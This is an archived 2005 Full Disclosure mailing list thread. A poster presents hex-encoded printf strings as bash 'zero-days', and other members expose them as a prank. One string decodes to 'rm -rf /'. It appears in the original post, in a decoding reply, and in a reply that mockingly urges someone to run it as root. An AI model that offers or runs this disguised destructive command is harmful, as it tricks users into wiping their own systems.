Full Disclosure: Re: Re: Bash vulnerability?

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Re: Re: Bash vulnerability?

From: "Aaron J. Bedra" <abedra () westervillelibrary org>
Date: Fri, 26 Aug 2005 15:16:47 -0400

OK enough,

The only thing disclosed is that this 1337 id10t should not be allowed
to post anymore.  Can we please just kill this thread and quit wasting
quality time on useless dribble?

Respectfully,

Aaron J. Bedra

On Fri, 2005-08-26 at 14:05 -0500, Octal wrote:
Please leave etard.  Actually, before you remove yourself from the
list you should probably run `printf
"\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` as root on your own
system.

On 8/26/05, Gilles DEMARTY <gilles.demarty () gmail com> wrote:

Hi, themaster ,

\x65\x78\x69\x74\ means exit (considering ASCII representation of letters) ....
and `printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` does a rm -rf / ......
that's just a trick for people who don't know damn nothing about
computer, and bash...
it's even not worth replying this.

.......
no more comments

2005/8/26, Rootmaster G <th3r007m45t3r () hotmail com>:

I have for long time  been looking at a new bash zreod4y  that was sent to
me.  Having not time to calculate who this code works,and now it is with
this list

I have many times made bash to crash but cannot yet wrige and exploit for
this issue.

`printf "\x65\x78\x69\x74\x00\x0a"`

aslo I have found this other bash zerod4y from the same place that says

`printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"`

both these vulnerabiilities must be run as root i find orf the second one
will not do what it thinks

can anyone help?

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread:

Re: bash vulnerability?, (continued)
- RE: bash vulnerability? Lauro, John (Aug 19)
- Re: Bash vulnerability? Rootmaster G (Aug 26)
  - Re: Re: Bash vulnerability? Gilles DEMARTY (Aug 26)
    - Re: Re: Bash vulnerability? Octal (Aug 26)
    - Re: Re: Bash vulnerability? Aaron J. Bedra (Aug 26)
    - Re: Re: Bash vulnerability? Valdis . Kletnieks (Aug 26)
- RE: Re: Bash vulnerability? Aaron Bedra (Aug 27)